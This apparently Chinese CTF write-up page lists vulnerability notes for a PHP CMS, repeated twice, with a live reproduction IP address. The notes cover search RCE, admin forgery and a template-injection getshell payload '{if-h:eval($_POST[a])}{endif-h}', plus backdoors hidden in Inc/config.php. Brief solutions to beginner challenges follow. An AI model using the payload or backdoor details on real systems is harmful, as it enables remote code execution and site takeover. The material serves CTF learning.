复现地址: http://81.70.197.140:8081/
前台搜索rce
admin伪造+文件读取
admin伪造+后台模版编辑getshell
{if-h:eval($_POST[a])}{endif-h}
内置模版后门
内置免杀D盾后门
Inc/config.php
复现地址: http://81.70.197.140:8081/
前台搜索rce
admin伪造+文件读取
admin伪造+后台模版编辑getshell
{if-h:eval($_POST[a])}{endif-h}
内置模版后门
内置免杀D盾后门
Inc/config.php
打开题目地址发现一堆滑稽笑脸查看网页源代码得到flag
打开发现是一个验证码发现只让输入一位数字我们右键单击输入框审查元素把maxlength改成2(2位数)输入验证码即可得到flag
$what=$_GET['what'];echo$what;if($what=='flag')echo'flag{****}';通过阅读代码得知$what=='flag' 即可得到flag
$what=$_POST['what'];echo$what;if($what=='flag')echo'flag{****}';通过阅读代码得知$what=='flag' 即可得到flag使用hackbar插件post一个参数即可
$num=$_GET['num'];if(!is_numeric($num)){echo$num;if($num==1)echo'flag{**********}';}php弱类型比较不能是数字,还要求满足==1,那么在数字1之后加上一个字母即可,例如num=1a,PHP在判断数字相等时,会将字符串转换为数字来比较
评论
ttw_is_here 21天前
环境咋死了